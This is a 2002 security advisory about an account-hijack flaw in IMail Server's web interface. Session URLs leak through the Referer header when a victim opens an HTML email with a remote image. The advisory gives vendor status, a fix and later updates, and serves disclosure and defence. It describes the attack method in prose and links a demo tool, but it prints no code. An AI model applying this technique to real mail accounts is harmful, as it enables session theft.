advisories ... IMail Account hijack through the Web Interface.

 

user comments
name
email
comments
 
smtp relay check
mailserver:
e-mail:
more info
translate to ...
language:
 
[1] . [2] . [3] . [4] . [5] . [6] . [7] . [8]
EyeonSecurity
Nekromantic
EyeonSecurity Forums
Ob5cureDotCom
elfqrin swg help net security
frame4 security hacker gurus computerglitch
gotr00t b0iler hackinthebox
nekromantic.com astalavista.net wand products
security-protocols
adv-knowledge rootshell wbglinks
security.nnov.ru
 
Copyright © 2001,2002 eyeonsecurity Inc., All Rights Reserved. No portions of eyeonsecurity may be used without express, written permission
 
Advisory Title: IMail Account hijack through the Web Interface
Release Date: 10/03/2002

Application: IMail Server

Platform: Windows NT4
Windows 2000
Windows XP

Version: 7.05 or earlier

Severity: Malicious users can easily access other people's accounts.

Author: Obscure^ [obscure@eyeonsecurity.org]

Vendor Status: Informed on 21 Feb 2002, a fix was already issued to customers.


Web:

http://www.eyeonsecurity.org
http://www.ipswitch.com

Background.

(extracted from
http://www.ipswitch.com/Products/IMail_Server/index.html)

The 20-Minute E-Mail Solution.
IMail Server is an easy-to-use, web-enabled, secure and spam-resistant mail server for Windows NT/2000/XP. It is the choice of businesses, schools, and service providers.

A Great Price-Performer.
Unlike Microsoft® Exchange and Lotus® Notes, which are costly to deploy and cumbersome to administer, IMail Server is easy to install and easy to manage. It has a simple pricing structure and is scalable to thousands of users per server.


Problem.

When a user logs in to his account through the Web interface, the session authentication is maintained via a unique URL.
By sending an html e-mail which includes an image at another server, an attacker can easily get the unique URL via the referer field in the HTTP header.

Exploit Example.

https://www.eyeonsecurity.org/tools/referer.html
A CGI script sends an e-mail with an attached image, pointing to another CGI script which sends the referer URL to the attacker.


Fix

Upgrade to IMail 7.06. The fixed version checks for the IP. The authentication now relies on the unique URL and the IP address. Of course users who log in to IMail Web interface from behind proxies, are still vulnerable.

ps. this same vulnerability effects Excite Mail. However these guys did not contact me back.


Disclaimer.

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.

Update [march 11 2002]
This vulnerability was already published on bugtraq by Zillion zillion AT safemode DOT org. Check out http://cert.uni-stuttgart.de/archive/bugtraq/2001/10/msg00082.html for more information.

Update [march 12 2002]
In my testing, when using HTTPS (secure mode) to access your IMail
account, the referer is not being sent, meaning that clients using
HTTPS should not be vulnerable. This was tested with Internet Explorer 6
and Mozilla 0.9.8 against the tool at:
https://www.eyeonsecurity.org/tools/referer.html


Feedback.

Please send suggestions, updates, and comments to:

Eye on Security
mail:obscure@eyeonsecurity.org
http://www.eyeonsecurity.org